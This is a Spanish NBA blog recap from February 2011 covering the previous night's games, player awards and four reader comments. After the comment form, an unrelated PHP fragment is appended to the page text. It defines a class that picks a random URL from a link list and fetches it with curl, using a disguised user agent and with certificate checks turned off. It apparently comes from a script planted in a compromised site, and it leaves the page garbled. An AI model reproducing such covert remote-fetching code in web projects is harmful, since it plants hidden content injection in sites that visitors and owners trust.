La Crónica (14/02/2011)

15 de February de 2011 por TheDeerHunter

El caso que nos ocupa hoy no es noticia aunque sea algo casi paranormal. Los Lakers inexorablemente suelen perder contra los Bobcats. 8 derrotas en los últimos 10 encuentros. Junto a los Celtics, son las dos únicas franquicias con balance positivo contra los amarillos.
La de anoche casi no tiene mérito para el equipo de Silas, simplemente no hubo rival delante. Sin ataque y sin defensa los campeones se llevaron la derrota más dura de la temporada (89-109). La segunda debacle consecutiva justo cuando parecía que empezaban a entonarse.

En cambio, los Spurs siguen a lo suyo y ganaron sin problemas en New Jersey (102-85) mientras que en Detroit hubo un conato de batacazo de los Hawks cuando llegaron a perder de 15.  Empujados por un Josh Smith que se puso las botas ante un impotente Prince, se pusieron las pilasen en la segunda parte dejando a los Pistons por debajo del 30% en tir0 (94-79).

La defensa exterior de los Nuggets volvió a ser puesta en evidencia con 14 triples en 32 intentos por parte de los Rockets (102-121). Por su parte, Los Blazers no notaron la presión de Houston en el cogote y ganaron bien en Minneapolis (95-81), con otro buen partido de Rudy, junto a Aldridge, Matthews y Cunningham jugando de center.

Finalmente los Bucks recordaron el “fear the deer” dejando en 78 puntos a los Clippers de Griffin y Davis (78-102). Jennings volvió a parecerse a si mismo y Delfino les endosó 7 triples.

PREMIOS

MVP: Josh Smith fue el mejor de los Hawks con 27 puntos, 14 rebotes, 3 asistencias y 3 robos. De esta manera continúa reinvidicándose como líder del equipo por encima de Joe Johnson en los últimos partidos.

Rookie: Blake Griffin sigue haciendo sus números (esta noche 19-12-6) pero los Clippers no ganan. La baja de Eric Gordon está resultando fundamental.

Sorpresa: Nada más y nada menos que 7 triples de 10 intentos fueron los que anotó Carlos Delfino en la victoria de los Bucks frente los Clippers. Otros que tuvieron el día inspirado fueron Courtney Lee, con 5 de 7 en triples para un total de 22 puntos, Dante Cunningham, que en 24 minutos anotó 18 puntos y capturó 13 rebotes, y Shane Battier, que no falló ninguno de sus 7 lanzamientos a canasta.

Decepción: Wesley Johnson jugó anoche 12 minutos en los que  no fue capaz de anotar a pesar de intentarlo en 6 ocasiones. Además no fue capaz de coger ningún rebote ni repartir ninguna asistencia. Una actuación para olvidar lo antes posible.

Esfuerzo en vano: En la impresionante caraja de los Lakers solo se salvó Pau Gasol que plantó cara con 17 puntos (6 de 9), 10 rebotes, 5 asistencias y 2 robos.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. baruc dice:
    #1

    Comentas que la baja de Gordon esta siendo fundamental, se sabe algo de cuando vuelve??

      Citar

  2. Txusma dice:
    #2

    Pues la cosa no está nada clara pero tiene toda la pinta que puede estar fuera hasta finales de Febrero.

      Citar

  3. Scriers dice:
    #3

    De verdad Lakers, vaya 2 palos seguidos. A veces lo de esa desidia es inexplicable. Bueno sí, Fisheer apenas seguía a su atacante y cuando entró el banq1uillo el equipo literalmente se hundió. Con Kobe y Pau no basta. Los Odom, Artest y cia tienen que corresponder como bien asalariados que estän

      Citar

  4. AndiD dice:
    #4

    Pues para mi, la sorpresa del día ha sido Mike Bibby: 17 pts, 6 reb, 7 as, 1 robo, 2 perd y +25 con él en pista!! Su mejor partido de la temporada 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>